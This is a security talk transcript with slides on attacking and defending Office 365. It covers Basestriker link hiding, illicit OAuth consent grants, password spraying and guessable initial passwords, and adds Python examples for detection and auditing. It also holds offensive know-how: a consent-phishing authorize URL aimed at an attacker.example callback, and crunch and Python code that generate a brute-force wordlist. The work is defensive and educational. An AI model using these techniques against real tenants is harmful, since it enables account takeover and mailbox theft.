
Office365 from a hacker's perspective: Real-life Threats, Tactics and Remedies


Office 365 environments are very attractive targets for attackers. So, it's never been more important to understand how its security structure works, and how to best configure it.

In this in-depth session, we'll run through real-time attack scenarios and examine common attack vectors. And then we'll explore the various defense capabilities of Office 365, the MS Graph API, and Azure AD. We'll deep-dive into external sharing, authentication options, third-party application security (what apps should and shouldn't be able to do), and even some do's and don'ts regarding Azure AD endpoints and authorization mechanisms.

You'll walk away with a solid understanding of how to use the Office 365 defense tools at your disposal, such as the Attack Simulator and Threat Intelligence, as well as how they relate to real-world attacks.



  1. Office365 from a Hacker's perspective: Real life threats, tactics and remedies. Twitter: @BenMenesi
  2. Speaker: Ben Menesi (@BenMenesi). Head of Products at Ytria; started out in the IBM world (admin & developer); SharePoint & Exchange admin and developer; Certified Ethical Hacker v9 and current OSCP student; enjoys breaking things; speaker at IT events around the globe on all things collaboration and security (SPS Toronto, Calgary, Geneva, Cambridge, Chicago, etc.).
  3. Who we are: Ytria. Founded in '99 in Montreal, Canada; started in the IBM software world; 500+ customers, 3k orgs, 165 countries; sapio365 GA in summer 2018.
  4. What we do: sapio365, a locally installed administration client for O365 (users, groups, Teams, OneDrive & more); PowerShell-less reporting, bulk updates and security monitoring; free for <50 users, 3-month key for anyone at Omaha SP UG.
  5. Agenda, what we'll cover today: ransomware attacks; email security; multi-factor authentication; illicit consent grants.
  6. Statistics, some numbers from the field (Verizon's 2017 & 2018 Data Breach Investigations Report, breach-investigations-report/): 53,000 incidents and 2,216 data breaches; 58% of victims are businesses with <1,000 employees (62% in 2017); 92% of malware arrived by email (6.3% web, 1.3% other); 68% of breaches took months(!!!) to discover.
  7. On-prem vs. cloud security, benefits of having your data in the cloud: broader scope of threat intelligence; larger and more specialized security muscle than most SMBs; fast, automatic delivery of fixes (no manual patching required).
  8. On-prem vs. cloud security, disadvantages of using cloud services: vulnerability mitigation is out of your control; your organization is part of a larger attack surface; less wiggle-room to tailor defenses to your needs.
  9. Ransomware, practical example: the Basestriker attack gets around Microsoft ATP Safe Links by leveraging the HTML <base> tag. A <base href="..."> in the message head sets the base URL against which every relative link in the body is resolved, so the mail client opens a full phishing URL while a scanner that only reads the <a href> attribute sees a harmless-looking relative path and never rewrites it. Traditional way to embed URLs in a phishing email: (screenshot not reproduced). Using the <base> tag: (screenshot not reproduced).
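How the <base> trick changes where a link really points, as an added example that is not part of the talk: the two HTML snippets are constructed stand-ins for the slide's screenshots, the hostname login.example-phish.test is a placeholder, and naive_links / effective_links / hidden_destinations are illustrative names. A scanner that behaves like naive_links sees only "owa/"; the mail client behaves like effective_links.

```python
"""Resolve phishing links the way a mail client does: honour <base href>.

Added example (not from the original slides). The two HTML snippets below
are constructed for illustration; the hostname is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed samples: a conventional phishing mail and a Basestriker-style one
TRADITIONAL_MAIL = """
<html><body>
<p>Your mailbox is almost full.</p>
<a href="https://login.example-phish.test/owa/">Free up space</a>
</body></html>
"""

BASE_TAG_MAIL = """
<html><head><base href="https://login.example-phish.test/"></head><body>
<p>Your mailbox is almost full.</p>
<a href="owa/">Free up space</a>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collects the first <base href> and every <a href> in document order."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.raw_hrefs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and self.base is None and attrs.get("href"):
            self.base = attrs["href"]          # first <base> wins, per the HTML spec
        elif tag == "a" and attrs.get("href"):
            self.raw_hrefs.append(attrs["href"])


def naive_links(html):
    """What a scanner sees if it only reads the href attribute of <a> tags."""
    p = LinkCollector()
    p.feed(html)
    return p.raw_hrefs


def effective_links(html):
    """What the mail client actually opens: each href joined with <base href>."""
    p = LinkCollector()
    p.feed(html)
    base = p.base or ""
    return [urljoin(base, h) for h in p.raw_hrefs]


def hidden_destinations(html):
    """Links whose real host differs from (or is missing in) the raw href.

    Returns (raw_href, effective_url) pairs; a non-empty list means the
    <base> tag changed where a link points and a naive scan was wrong.
    """
    p = LinkCollector()
    p.feed(html)
    base = p.base or ""
    findings = []
    for raw in p.raw_hrefs:
        eff = urljoin(base, raw)
        if urlsplit(raw).netloc != urlsplit(eff).netloc:
            findings.append((raw, eff))
    return findings


if __name__ == "__main__":
    for name, mail in (("traditional", TRADITIONAL_MAIL), ("base-tag", BASE_TAG_MAIL)):
        print(name, "naive:", naive_links(mail))
        print(name, "effective:", effective_links(mail))
        print(name, "hidden:", hidden_destinations(mail))
```

The defensive check is hidden_destinations: any link whose effective host differs from the host in its raw href is a candidate for rewriting or blocking, regardless of whether the base host itself is on a blocklist.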
  10. Ransomware, attack timeline: 02.05.2018 Microsoft alerted by Avanan; 02.05.2018 Proofpoint alerted by Avanan; 16.05.2018 Microsoft fixes the vulnerability; 14 days in between.
  11. Ransomware, a more recent attack: MFA bypass via IMAP (credential-dumps-phishing-and-legacy-email-protocols). Highlights (details discussed later): 100,000 unauthorized login attempts analyzed (December 2018 onwards); 72% of tenants were targeted at least once; 40% of tenants had at least one compromised account; 15 out of every 10,000 active user accounts were breached.
  12. Ransomware (screenshot not reproduced).
  13. Ransomware attacks, why are they so important? DOJ statistics: 1,000 attacks/day in 2015, 4,000 attacks/day in 2017; WannaCry: 150 countries, estimated at $4B; NotPetya: $250-300M for Maersk alone, $1.2B in total; 54% of companies experienced one or more successful attacks; total cost of a successful cyber attack is over $5M, or $301 per employee.
  14. Ransomware protection, how do they spread? 60% of ransomware attacks come from infected emails, BUT vulnerable (application) servers are also a vector. Example: the city of Atlanta was hit by SamSam (originally discovered in 2016) in 2018; the infection likely came through SMBv1 left open on a web server; aftermath: $2.6M cost. Conclusion: update, patch, pay attention to cyber hygiene!
  15. Ransomware protection, decrypting ransomware. Cautionary tale: Herrington & Company gets ransomwared; engages a data recovery company to retrieve the data; the DR company quotes $6,000 to recover it; the recovery is WAY too fast; the FBI confirms that PDR indeed paid the ransom to decrypt the victim's files. So how do we prevent ransomware?
  16. Ransomware protection in Office 365: Microsoft introduced Files Restore for OneDrive; it allows restoring an entire OneDrive account to a previous point in time within the last 30 days; it monitors file assets and notifies you if an attack is detected.
  17. Ransomware protection in Office 365. Careful! The real-time notification might not be as accurate as we think: AxCrypt encryption of files on OneDrive flies easily under the radar. Ransomware prevention: have users store important data in OneDrive, since Files Restore can only roll back what lives there.
  18. Email & Sharing
  19. Email encryption, new(ish) advanced email protection options. Email encryption: "end-to-end encryption" (in practice Office 365 Message Encryption is service-side encryption with Microsoft-managed keys unless you bring your own key, so it is not end-to-end in the strict sense). Prevent forwarding: restrict recipients from forwarding or copying emails you send (plus: attached MS Office documents stay encrypted even after downloading). What happens if the recipient is outside your organization: (screenshot not reproduced).
  20. Email encryption: OME is automatically enabled (screenshot not reproduced).
  21. Email encryption, new advanced email protection options: the OME Viewer app is now deprecated; the iOS Mail app didn't support decrypting messages protected by OME; rights restrictions become void for such clients (even so, if the recipient is on an Office 365 mail server, forwarding such a mail is still not allowed). To toggle this: Set-ActiveSyncOrganizationSettings -AllowRMSSupportForUnenlightenedApps <$true|$false>. Note: previously encrypted messages won't be viewable on iOS. Review what's new in OME: us/office365/securitycompliance/set-up-new-message-encryption-capabilities. Tip: customize your OME message look and feel: us/article/add-your-organizations-brand-to-your-encrypted-messages-7a29260d-2959-42aa-8916-feceff6ee51d
  22. Email encryption, revoking encrypted messages (this one is thanks to Al Hoitingh: message-revocation/). Encrypted status means the email and its content didn't leave the perimeter. Use Message Trace to locate the outgoing mail, then use PowerShell to query the OME status: Get-OMEMessageStatus -MessageId "<message id>"; and to set the message as revoked: Set-OMEMessageRevocation -Revoke $true -MessageId "<message id>".
  23. Email encryption, revoking encrypted messages: because the data never left the perimeter, it's the link that's broken at the moment of revocation, and the recipient will get this: (screenshot not reproduced).
  24. Illicit Consent Grants
  25. Azure AD applications, illicit consent grants: in light of the Facebook/Cambridge Analytica scandal, we should take a look at Azure AD registered applications; phishing campaigns can trick users into granting an attacker's application access to their data (against-illicit-consent-grants/); the exploit was first demonstrated by Kevin Mitnick.
  26. Azure AD applications, exploit scenario: demo. Infrastructure: user, Apache web server, hacker (diagram not reproduced).
  27. Azure AD applications, exploit scenario: infrastructure in a bit more detail (thanks to Albert Hoitingh; diagram not reproduced).
  28. Azure AD applications, exploit scenario: let's see this live!
  29. Azure AD applications, exploit scenario: the user receives a legit-looking email (screenshot not reproduced).
  30. Azure AD applications, exploit scenario: the user picks an account to authenticate with (screenshot not reproduced).
  31. Azure AD applications, exploit scenario: the user is presented with permissions that need consent, and they make sense (screenshot not reproduced).
  32. Azure AD applications, exploit scenario: all mails encrypted... and this is just one of many possible outcomes once the app holds a token for the mailbox.
  33. Azure AD applications, introduction, digital #metoo era: consent is key! Why build integrated applications? Using the various APIs, you can grant apps access to your tenant data: mail, calendars, contacts, conversations; users, groups, files and folders; SharePoint sites, lists, list items; OneDrive items, permissions and more. Integration: Azure AD provides secure sign-in and authorization; the developer registers the application with Azure AD and assigns it permissions; a tenant administrator or user must consent to those permissions.
  34. Azure AD applications, registering the application: who can register applications in your tenant? By default: any member! This can be a security issue. Keep in mind: there is a record of what data was shared with which application, and when a user adds or allows an application to access their data, the event can be audited (audit reports). See more: directory/develop/active-directory-how-applications-are-added#who-has-permission-to-add-applications-to-my-azure-ad-instance
  35. Azure AD applications, Azure AD endpoints, endpoint v1: Azure AD admin center > Enterprise Applications > New Application (screenshot not reproduced).
  36. Azure AD applications, Azure AD endpoints, endpoint v1 properties: only supports one platform per application; supports ALL APIs; static permissions.
  37. Azure AD applications, Azure AD endpoints, endpoint v2 properties: supports multiple platforms; only supports the Graph API; scopes vs. resources (dynamic permissions); the strategic new direction for Microsoft. Gotcha: v1 and v2 aren't compatible!
  38-41. Azure AD applications, registering the application, what you'll need (built up over four slides): application name; application password (client secret); platform; redirect URL(s); owner(s); permissions, either delegated or application.
  42. Azure AD applications, permissions: Azure AD v1 endpoint permissions (delegated only): 87; Azure AD v2 endpoint permissions: 77 delegated, 39 application.
  43. Azure AD applications, consent: the application will access data and act on your behalf, so consent is required. Two types of consent: user consent (limited-scope actions, delegated permissions only); admin consent (larger-scope actions, some delegated and all application permissions).
  44. Azure AD applications, authorization flow: OAuth2 / OpenID Connect (diagram not reproduced).
  45. Azure AD applications, authorization flow, how does it work? The user consents to the permissions required by the app; the application asks Azure AD for authorization; Azure AD makes the user sign in and returns an authorization code to the application; the application redeems the code for a JWT bearer token and uses it against the resource (Microsoft Graph API). Keep in mind: the bearer token doesn't authenticate the caller, it only authorizes: Graph accepts it from whoever presents it, so hijacking the token is extremely dangerous.
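The same flow from the application's side, as an added example (not the talk's code): it builds the v2 authorize request, validates the state parameter on the callback, and decodes the claims of a bearer token to list what it authorizes. The client_id, tenant, redirect URI and the token are constructed placeholders; the token is built unsigned here purely so the scp claim can be read offline, and make_fake_token / HIGH_IMPACT_SCOPES / authorized_actions are illustrative names.

```python
"""Walk through the authorization code flow from the application's side and
inspect what the resulting bearer token authorizes.

Added example, not code from the talk. The client_id, tenant, redirect URI
and the access token are constructed placeholders; the token is an UNSIGNED
JWT built here only so the claim layout can be shown offline.
"""
import base64
import json
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

AUTHORIZE = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/authorize"

# Delegated, user-consentable scopes an attacker would love a victim to grant
HIGH_IMPACT_SCOPES = {"Mail.ReadWrite", "Mail.Send", "Files.ReadWrite.All", "Contacts.ReadWrite"}


def build_authorize_url(tenant, client_id, redirect_uri, scopes, state):
    """Step 1: the app sends the user to Azure AD asking for these scopes.

    Everything in this URL is attacker-controlled; the only thing that is not
    is the user's decision on the consent screen that follows.
    """
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "response_mode": "query",
        "scope": " ".join(scopes),
        "state": state,
    }
    return AUTHORIZE.format(tenant=tenant) + "?" + urlencode(params)


def parse_callback(redirect_url, expected_state):
    """Step 2: Azure AD sends the user back with ?code=...&state=...

    Returns the code, or None if state does not match (CSRF / code injection).
    """
    q = parse_qs(urlsplit(redirect_url).query)
    if q.get("state", [None])[0] != expected_state:
        return None
    return q.get("code", [None])[0]


def _b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def _b64url_encode(obj):
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_fake_token(claims):
    """Constructed, unsigned JWT so the example runs offline (never accept alg=none for real)."""
    header = {"typ": "JWT", "alg": "none"}
    return ".".join([_b64url_encode(header), _b64url_encode(claims), ""])


def token_claims(jwt):
    """Step 3: read the payload WITHOUT verifying the signature.

    Only the resource (Graph) needs to validate the signature; this is just
    to see what the bearer is allowed to do.
    """
    return json.loads(_b64url_decode(jwt.split(".")[1]))


def authorized_actions(jwt):
    """What the bearer can do: delegated scopes (scp, space-separated) and app roles (roles)."""
    c = token_claims(jwt)
    scopes = set(c.get("scp", "").split())
    roles = set(c.get("roles", []))
    return {"scopes": scopes, "roles": roles,
            "high_impact": sorted((scopes | roles) & HIGH_IMPACT_SCOPES)}


if __name__ == "__main__":
    state = secrets.token_urlsafe(16)
    url = build_authorize_url("common", "00000000-0000-0000-0000-000000000000",
                              "https://attacker.example/callback",
                              ["openid", "offline_access", "Mail.ReadWrite", "Files.ReadWrite.All"],
                              state)
    print(url)
    print("code:", parse_callback(f"https://attacker.example/callback?code=AQAB&state={state}", state))
    tok = make_fake_token({"aud": "https://graph.microsoft.com",
                           "scp": "Mail.ReadWrite Files.ReadWrite.All openid",
                           "upn": "victim@contoso.example"})
    print(authorized_actions(tok))
```

Note that nothing in authorized_actions ties the token to the machine or user presenting it: that is the "authorizes, doesn't authenticate" point. Whoever exfiltrates the token string gets the same scp claims until it expires.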
  46. Azure AD applications, how do you prevent illicit consent grants? Application registration and consent restrictions; regular application and permission enumeration; Cloud App Security; educate users.
  47. Azure AD applications, remedy, restricting app registrations: Azure Portal > Azure Active Directory > User settings (screenshot not reproduced).
  48. Azure AD applications, remedy, restricting consent grants: Azure Portal > Azure Active Directory > User settings (screenshot not reproduced).
  49. Azure AD applications, remedy, restricting consent & app registrations. While we're at it: ordinary users are by default allowed to access the Azure AD administration portal, which lets them view all users' group memberships, all users' assigned licenses and enabled services, and all users' directory roles (i.e. find the global administrator accounts). Best to disable this: Azure Active Directory > User settings > Administration portal. Caveat: this only blocks the portal UI; under the default member permissions the same directory data stays readable through PowerShell or the Graph API.
  50. Azure AD applications, remedy, enumerating apps and permissions using PowerShell: install the AzureAD PowerShell module (launch PowerShell ISE as an administrator and run Install-Module AzureAD); connect to Azure AD with Connect-AzureAD; then run the Get-AzureADPSPermissions.ps1 script, for example .\Get-AzureADPSPermissions.ps1 | Export-Csv -Path "permissions.csv" -NoTypeInformation
  51. Azure AD applications, remedy, enumerating apps and permissions: what you get (screenshot not reproduced).
  52. Azure AD applications, remedy, enumerating apps and permissions. Gotcha: the script won't show redirect URLs! To get apps and their redirect URLs use Get-AzureRmADApplication, which requires the AzureRM.Resources module and a prior Connect-AzureRmAccount.
  53. Azure AD applications, remedy, searching your audit logs: use the "consent" string to filter (screenshot not reproduced).
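Doing the same "consent" search over an exported audit log, as an added example rather than the talk's own: the records are constructed and only loosely follow the Azure AD directoryAudits shape (activityDisplayName, initiatedBy, targetResources with modifiedProperties such as ConsentAction.Permissions), so the field names are an assumption to check against your real export; RISKY_SCOPES and the triage function are illustrative names.

```python
"""Triage 'Consent to application' events from an Azure AD audit log export.

Added example, not from the talk. The records below are constructed and only
loosely follow the Azure AD directoryAudits schema (activityDisplayName,
initiatedBy, targetResources/modifiedProperties); adapt the field names to
your actual export before relying on it.
"""
import json

# Constructed sample: two consent events (one is the phishing scenario) and one unrelated event
SAMPLE_AUDIT_EXPORT = json.dumps([
    {
        "activityDisplayName": "Consent to application",
        "activityDateTime": "2019-04-02T09:15:00Z",
        "initiatedBy": {"user": {"userPrincipalName": "alice@contoso.example"}},
        "targetResources": [{
            "displayName": "Mail Quota Helper",
            "modifiedProperties": [
                {"displayName": "ConsentContext.IsAdminConsent", "newValue": "\"False\""},
                {"displayName": "ConsentAction.Permissions",
                 "newValue": "\"[] => [[Scope: Mail.ReadWrite Files.ReadWrite.All offline_access]]\""},
            ]}],
    },
    {
        "activityDisplayName": "Consent to application",
        "activityDateTime": "2019-04-02T10:00:00Z",
        "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}},
        "targetResources": [{
            "displayName": "Corporate Helpdesk",
            "modifiedProperties": [
                {"displayName": "ConsentContext.IsAdminConsent", "newValue": "\"True\""},
                {"displayName": "ConsentAction.Permissions",
                 "newValue": "\"[] => [[Scope: User.Read]]\""},
            ]}],
    },
    {
        "activityDisplayName": "Add service principal",
        "activityDateTime": "2019-04-02T10:01:00Z",
        "initiatedBy": {"user": {"userPrincipalName": "admin@contoso.example"}},
        "targetResources": [{"displayName": "Corporate Helpdesk", "modifiedProperties": []}],
    },
])

# Delegated scopes a phished user can grant that hand over mailbox/file access
RISKY_SCOPES = {"Mail.ReadWrite", "Mail.Read", "Mail.Send", "Files.ReadWrite.All",
                "Files.Read.All", "Contacts.ReadWrite", "offline_access"}


def _prop(resource, name):
    """Look up one modifiedProperties entry; newValue is itself a JSON-encoded string."""
    for p in resource.get("modifiedProperties", []):
        if p.get("displayName") == name:
            return json.loads(p["newValue"])
    return None


def consent_events(export_json):
    """Filter on 'consent', the equivalent of typing it into the portal's search box."""
    return [e for e in json.loads(export_json)
            if "consent" in e.get("activityDisplayName", "").lower()]


def parse_scopes(permissions_value):
    """Pull scope names out of a value like '[] => [[Scope: Mail.ReadWrite User.Read]]'."""
    if not permissions_value or "Scope:" not in permissions_value:
        return set()
    inner = permissions_value.split("Scope:", 1)[1]
    return set(inner.replace("]", " ").split())


def triage(export_json):
    """One finding per consent event; suspicious = user (not admin) consent to risky scopes."""
    findings = []
    for e in consent_events(export_json):
        who = e.get("initiatedBy", {}).get("user", {}).get("userPrincipalName", "?")
        for r in e.get("targetResources", []):
            scopes = parse_scopes(_prop(r, "ConsentAction.Permissions"))
            admin = _prop(r, "ConsentContext.IsAdminConsent") == "True"
            findings.append({
                "when": e.get("activityDateTime"),
                "user": who,
                "app": r.get("displayName"),
                "admin_consent": admin,
                "scopes": sorted(scopes),
                "risky": sorted(scopes & RISKY_SCOPES),
                "suspicious": (not admin) and bool(scopes & RISKY_SCOPES),
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_AUDIT_EXPORT):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['when']} {f['user']} -> {f['app']} {f['risky']}")
```

Run this on a scheduled export and alert on any finding with suspicious set; pairing it with the consent restriction on slide 48 means the alert should almost never fire, which makes it worth investigating when it does.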
  54. Azure AD applications, remedy, Cloud App Security: create an OAuth app security policy (screenshot not reproduced).
  55. Azure AD applications, remedy, Cloud App Security (screenshot not reproduced).
  56. Azure AD applications, what you get with Cloud App Security in our scenario (screenshot not reproduced).
  57. Password Attacks
  58. Brute force attacks, brute-forcing Office 365 logins. In the news in August 2017: a sophisticated and coordinated attack against 48 Office 365 customers; unusual for a brute-force attack in that it targeted multiple cloud providers; 100,000 failed login attempts from 67 IPs and 12 networks over 7 months; slow and low to avoid intrusion detection; users saw unsuccessful login attempts using up to 17 variations of their name; the passwords tried were likely the same across accounts (a password spray attack). office-365-accounts/
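Detecting this low-and-slow pattern in sign-in data, as an added example not from the talk: the log lines are constructed, the CSV layout (timestamp, user, source IP, result) is a simplification of an Azure AD sign-in export, and the thresholds and the spray_candidates name are illustrative. The point it shows is that per-account lockout counters never see a spray; breadth per source does.

```python
"""Spot a low-and-slow password spray in sign-in logs.

Added example, not from the talk. The log lines are constructed; the format
(timestamp, user, source IP, result) is a simplification of an Azure AD
sign-in export, so adapt the parser to your real columns.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one IP failing once against many users over hours
# (then succeeding for one of them), plus a user mistyping their own password.
SIGNIN_LOG = """\
2019-03-01T01:10:00Z,alice@contoso.example,203.0.113.7,Failure
2019-03-01T02:40:00Z,bob@contoso.example,203.0.113.7,Failure
2019-03-01T04:05:00Z,carol@contoso.example,203.0.113.7,Failure
2019-03-01T05:55:00Z,dave@contoso.example,203.0.113.7,Failure
2019-03-01T07:30:00Z,erin@contoso.example,203.0.113.7,Failure
2019-03-01T08:02:00Z,erin@contoso.example,203.0.113.7,Success
2019-03-01T08:00:00Z,frank@contoso.example,198.51.100.20,Failure
2019-03-01T08:01:00Z,frank@contoso.example,198.51.100.20,Failure
2019-03-01T08:02:00Z,frank@contoso.example,198.51.100.20,Success
"""


def parse_signins(text):
    """Parse the simplified CSV into dicts with a timezone-aware timestamp."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, result = line.split(",")
        rows.append({"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                     "user": user, "ip": ip, "ok": result == "Success"})
    return rows


def spray_candidates(rows, window=timedelta(hours=24), min_users=5, max_per_user=2):
    """Sources that fail against many distinct users but only a few times each.

    Classic brute force trips per-account lockout (many failures, one user);
    a spray stays under it (few failures per user, many users). So the signal
    is breadth per source IP inside the window, not depth per account. Only
    the window starting at each source's first failure is examined here.
    """
    by_ip = defaultdict(list)
    for r in rows:
        if not r["ok"]:
            by_ip[r["ip"]].append(r)
    findings = []
    for ip, fails in by_ip.items():
        fails.sort(key=lambda r: r["ts"])
        start = fails[0]["ts"]
        in_window = [r for r in fails if r["ts"] - start <= window]
        per_user = defaultdict(int)
        for r in in_window:
            per_user[r["user"]] += 1
        if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
            # A later success from the same source against a sprayed user is the real alarm
            succeeded = sorted({r["user"] for r in rows
                                if r["ip"] == ip and r["ok"] and r["user"] in per_user})
            findings.append({"ip": ip, "users_tried": len(per_user),
                             "compromised": succeeded})
    return findings


if __name__ == "__main__":
    for f in spray_candidates(parse_signins(SIGNIN_LOG)):
        print(f"possible spray from {f['ip']}: {f['users_tried']} users tried, "
              f"success for {f['compromised'] or 'none'}")
```

In the sample, frank's three failures from one address are the noisy-but-benign case (one user, many tries) and do not fire; the 203.0.113.7 source fires because it touched five accounts once each, and the follow-up success for erin is what should be escalated.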
  59. Brute force attacks: demo. How hard is it to acquire the right login names?
  60. Brute force attacks, account lockout in Office 365 before this Tuesday (02/04/2019): 10 unsuccessful attempts: captcha; another 10: lockout (10 minutes); in reality, 10 tries = lockout; no customization allowed.
  61. Brute force attacks, account lockout in Office 365 as of Tuesday 02/04/2019: WOOHOO! Azure AD Password Protection is now generally available: Identity/Azure-AD-Password-Protection-is-now-generally-available/ba-p/377487#.XKYVYnSP8eU.twitter
  62. Authentication, MFA: multi-factor authentication; focus: cloud only, i.e. Azure Active Directory MFA; grants access to users based on a password / PIN / security token / device / biometric ("DNA") information; free support for MFA on Office 365 apps. Interesting story: what could've stopped all this? (screenshot not reproduced)
  63. Authentication, MFA, true story: I'll just put this here... Thanks to @RachelTobac for this gem (screenshot not reproduced).
  64. Authentication, MFA, true story. Good news: management through the app is better (screenshot not reproduced).
  65. Authentication, MFA, the elephant in the room: 2 serious outages in 2018 alone.
  66. Authentication, MFA in case of emergencies: consider implementing a break-glass account (via exclusions from the baseline MFA policy; default-for-admins/): Azure AD portal > Conditional Access.
  67. Authentication, the way around MFA: recent breaches discovered by Proofpoint (leverage-credential-dumps-phishing-and-legacy-email-protocols). Essentially: using IMAP to get around MFA by mimicking legacy email clients, because legacy (basic) authentication protocols have no way to prompt for a second factor.
  68. Authentication, the way around MFA, Microsoft's response (365/enterprise/secure-email-recommended-policies): require MFA; block clients that don't support modern auth; app passwords. Caveat: an app password is a single-factor credential that lets a legacy client in without MFA, so once legacy protocols are blocked, disable app passwords rather than hand them out.
  69. Attack simulation, the all-new Office 365 Attack Simulator: available as part of Threat Intelligence (Office 365 Enterprise E5); follows logical penetration-testing steps; you must be a global administrator or a member of the Security Administrator role in the Security & Compliance Center AND have MFA enabled on your account. What it allows you to do: spear phishing campaigns; password brute-force attacks; password spray attacks. Requirements: multi-factor authentication must be enabled; attack simulations must be set up.
  70. Attack simulation, the all-new Office 365 Attack Simulator, where to find it: / Threat Management (screenshot not reproduced).
  71. Attack simulation, spear phishing campaigns: only works for individual users (no groups for now); tip: target the users identified as top targeted in the Threat Management dashboard; tip 2: you'll need to enable Office Analytics.
  72. Attack simulation, spear phishing campaigns: the user tries to log in to the phishing site and is redirected to the awareness page (screenshots not reproduced).
  73. Attack simulation, spear phishing campaigns. Tip: best to use your own phishing sites; Google has already flagged most of the built-in ones.
  74. Attack simulation, brute-force password: use a pre-set word list against one or multiple user accounts; uses the same method an attacker would, and I mean literally: watch out, currently this locks out the user account; only supports very limited password lists (internal server error at 10k passwords); best online resources for common credentials: mon-Credentials
  75. Attack simulation, password spray attack: tries one or a few passwords against all accounts. Story: a known password against two accounts; both accounts DID have that password, yet only one showed up as compromised. Why? Gotcha: the second user had MFA enabled, which doesn't appear to be supported.
  76. Threat Tracker, generally available in Office 365 Security & Compliance: tracks major malware campaigns (WannaCry, Petya, etc.); lets you track the impact of these campaigns in your tenant.
  77. Office 365 passwords, about generating random passwords: the current (4 April 2019) auto-generated password format isn't hard to guess (screenshot not reproduced). Tip: make sure users change their passwords on first login.
  78. Office 365 passwords, guessing random passwords: always 8 characters; starts with 3 letters; ends in 5 digits. Keyspace: consonant (21) x vowel (5) x consonant (21) x 5 digits (10 x 10 x 10 x 10 x 10) = 220,500,000 possible passwords.
  79. Office 365 passwords, guessing random passwords: pretty easy to create a password list for brute-force using crunch: crunch 8 8 aeiou BCDFGHJKLMNPQRSTVWXYZ 0123456789 bcdfghjklmnpqrstvwxyz -t ,@^%%%%% (crunch takes its charsets in the order lowercase, uppercase, digits, symbols, so in the pattern "," draws an uppercase consonant, "@" a vowel, "^" a lowercase consonant and each "%" a digit). File size: roughly 2 GB (220,500,000 lines of 8 characters plus a newline).
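Sizing the space and generating the same list in Python, as an added example (not the talk's code): the character classes follow the slide, the sample passwords are constructed, and keyspace / wordlist_bytes / candidates / looks_like_initial_password are illustrative names. It also gives a regex you can run against a credential dump to spot accounts that are still on the generated format, i.e. users who never changed their initial password.

```python
"""Model the auto-generated Office 365 initial password format and size the
brute-force space, the same thing the crunch command on the slide does.

Added example, not from the talk. Character classes follow the slide
(uppercase consonant, vowel, lowercase consonant, five digits); the sample
passwords are constructed.
"""
import itertools
import re

UPPER_CONSONANTS = "BCDFGHJKLMNPQRSTVWXYZ"   # 21
VOWELS = "aeiou"                           # 5
LOWER_CONSONANTS = "bcdfghjklmnpqrstvwxyz"  # 21
DIGITS = "0123456789"                      # 10

# Equivalent of the crunch pattern ,@^%%%%% with the slide's four charsets
INITIAL_PASSWORD_RE = re.compile(
    rf"^[{UPPER_CONSONANTS}][{VOWELS}][{LOWER_CONSONANTS}][{DIGITS}]{{5}}$")


def keyspace():
    """Number of candidate passwords the format admits: 21 * 5 * 21 * 10^5."""
    return len(UPPER_CONSONANTS) * len(VOWELS) * len(LOWER_CONSONANTS) * len(DIGITS) ** 5


def wordlist_bytes(line_terminator=b"\n"):
    """Size of the full list on disk: 8 characters plus a line terminator per entry."""
    return keyspace() * (8 + len(line_terminator))


def candidates(limit=None):
    """Generate the list lazily, in crunch order (last position varies fastest)."""
    gen = (u + v + c + "".join(d)
           for u in UPPER_CONSONANTS
           for v in VOWELS
           for c in LOWER_CONSONANTS
           for d in itertools.product(DIGITS, repeat=5))
    return itertools.islice(gen, limit) if limit else gen


def looks_like_initial_password(pw):
    """True if a password still matches the generated format, i.e. the user
    probably never changed it after first login."""
    return bool(INITIAL_PASSWORD_RE.match(pw))


if __name__ == "__main__":
    print("keyspace:", f"{keyspace():,}")
    print("list size:", f"{wordlist_bytes() / 1e9:.2f} GB")
    print("first candidates:", list(candidates(3)))
    for pw in ("Bam12345", "Tux90210", "Summer2019!", "bam12345"):
        print(pw, looks_like_initial_password(pw))
```

220 million candidates is small enough that the list is not the bottleneck; the online rate limits and lockout behaviour discussed on slides 60 and 61 are, which is why forcing a change at first login matters more than the list size.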
  80. Office 365 passwords, conclusion: simulate attacks against your own environment; keep an eye out for more attack simulation tools; use your own phishing tactics and word lists; educate users on strong passwords.
  81. Check out sapio365. Download sapio365 (free for 3 months):
  82. Thank you. Questions & feedback welcome. Let's connect: @BenMenesi